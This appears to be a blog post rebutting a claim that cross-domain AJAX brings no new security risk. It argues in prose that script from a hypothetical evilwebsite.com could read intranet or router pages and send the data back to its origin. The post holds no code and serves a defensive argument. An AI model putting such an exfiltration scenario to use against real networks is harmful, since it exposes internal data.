Cross Domain AJAX

AJAX is all the rage, but it can’t do everything people want it to do. For example, AJAX code from one site can’t access another site. The limitation is related to security… but recently Lucas Carlson set out to debunk cross-domain AJAX security myths.

Lucas Carlson does a good job of debunking some of the claimed security problems of AJAX, but he makes one big mistake in saying: “Cross-domain Ajax does not introduce any new security concerns.”

The major exception is Intranets, and Javascript’s ability to send data back to its originating server. Imagine you know that bigcompany.com runs an internal web-based directory system called directory.bigcompany.com. Obviously, this directory server is only accessible when you’re on the internal network at bigcompany.com. If Javascript can do cross-domain, then the following scenario is possible:

  1. Bob@bigcompany unknowingly downloads the evil JS code from evilwebsite.com
  2. the evil JS code runs a cross-domain AJAX query to directory.bigcompany.com, which it can now do because it’s running inside the firewall.
  3. the JS code then packages up the resulting directory information and ships it back to evilwebsite.com.

Taken to its logical extreme, cross-site AJAX means that anyone surfing from behind a firewall might become an unwilling proxy for a remote attacker, letting this attacker browse the web as if he were inside the firewall. Sure, it would be better if all internal services were password-protected, but the fact remains that this is a totally different game, now that this evil code can query within the firewall and send that data back to its originating server surreptitiously.

Unless I’m missing something radical about HTML and Javascript, this is something new that cross-domain AJAX would enable. Yes, Javascript can already “hit” any cross-domain URL with tricks like images or iframes, but it can’t do anything real with those hits, like process the contents, or send that content back to the originating server. Adding that ability would radically change the game, and it’s an enormous risk.

Lucas should correct his post, especially since the rest of his article is good and correctly debunks other security fears.

UPDATE: Lucas has apparently posted a response in the comments that acknowledges this very issue which was brought up by another reader. Unfortunately, Lucas downplays this issue thinking it’s “not a big deal.” It is a big deal. If cross-domain AJAX were deployed, you can bet that corporate systems would filter out all javascript. They don’t have a firewall up for nothing. And if users within corporate firewalls have Javascript disabled, bye bye web 2.0.

Not to mention, this isn’t just about companies. Everyone at home is basically on a firewalled network if they have a router. Is it okay for Javascript to be able to surreptitiously hit the internal administration web page of your router and report on any data it finds? Or maybe your small internal development web server? This is not a niche issue, and it’s the major reason why totally open cross-domain AJAX cannot and will not happen.